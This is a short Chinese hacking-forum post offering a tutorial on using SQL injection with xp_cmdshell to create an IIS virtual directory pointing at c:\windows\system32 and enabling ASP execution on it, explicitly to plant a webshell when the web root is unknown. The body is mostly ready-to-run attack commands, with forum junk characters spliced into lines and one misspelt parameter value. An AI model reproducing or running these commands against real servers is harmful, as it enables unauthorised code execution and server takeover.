返回列表 发帖

[原创教程] 如何SQL注入建立虚拟目录

很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:" y, h7 l) P( d/ Q" K

4 ]  t* s' J3 l+ p1 X; rexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'  ^, M% r% T& M+ B# x3 R
建立虚拟目录win,指向c:\windows\system32
8 H0 K: {' ?" Q" [/ fexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
# k" J6 b& X& [6 W/ }让win句有解析asp脚本权限
4 W) ?6 G, d/ ~9 ?" h; E2 ^9 x  O' e2 ]/ N
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"( h& a* x& R9 i0 q( t" m
删除虚拟目录。
$ H) L) R& V3 S8 w- D4 a* e3 n找不到web绝对路径的一种解决办法,* ?( C) Z( P7 m% }: K
7 T, _; M) U! q2 T: c0 H
403错误,表示虚拟目录建好了。。
1

评分人数

呀  LZ好久不见你上了啊

TOP

返回列表